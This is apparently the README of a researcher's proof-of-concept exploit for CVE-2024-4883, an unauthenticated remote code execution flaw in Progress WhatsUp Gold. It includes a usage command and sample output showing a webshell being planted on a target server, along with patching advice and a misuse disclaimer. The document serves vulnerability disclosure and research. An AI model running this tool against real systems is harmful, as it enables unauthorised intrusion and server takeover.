
CVE-2024-4883용 익스플로잇
CVE-2024-4883 Progress WhatsUp Gold WriteDatafile Unauthenticated Remote Code Execution (CVE-2024-4883)에 대한 PoC
취약점의 근본 원인 분석은 제 블로그에서 확인할 수 있습니다: https://summoning.team/blog/progress-whatsup-gold-WriteDataFile-CVE-2024-4883-RCE/
WhatsUpWriteDataFileExploit.exe --target 192.168.0.11 --port 9643 --webshell hax.aspx
_______ _ _ _______ _______ _____ __ _ _____ __ _ ______ _______ _______ _______ _______
|______ | | | | | | | | | | | \ | | | \ | | ____ | |______ |_____| | | |
______| |_____| | | | | | | |_____| | \_| __|__ | \_| |_____| . | |______ | | | | |
(*) Progress WhatsUp Gold WriteDataFile Unauthenticated Remote Code Execution (CVE-2024-4883)
(*) Exploit by Sina Kheirkhah (@SinSinology) of SummoningTeam (@SummoningTeam)
(*) Technical details: https://summoning.team/blog/progress-whatsup-gold-WriteDataFile-CVE-2024-4883-RCE
(^_^) Prepare for the Pwnage (^_^)
(*) Connecting to ICoreServices net.tcp://192.168.0.11:9643/
(*) Connection is ready
(*) Using write what where primitive, to plant C:\Program Files (x86)\Ipswitch\WhatsUp\html\NmConsole\eb8e455a-28d2-4628-80cb-ef2d786c8409.aspx
(+) Webshell has been planted at https://192.168.0.11/NmConsole/eb8e455a-28d2-4628-80cb-ef2d786c8409.aspx
최신 버전으로 업데이트하거나 Progress 권고 내 지침에 따라 완화하십시오.
이 소프트웨어는 학술 연구 및 효과적인 방어 기술 개발 목적으로만 제작되었으며, 명시적으로 승인된 경우를 제외하고 시스템을 공격하는 데 사용하기 위한 것이 아닙니다. 프로젝트 관리자는 소프트웨어의 오용에 대해 책임을 지지 않습니다. 책임감 있게 사용하십시오.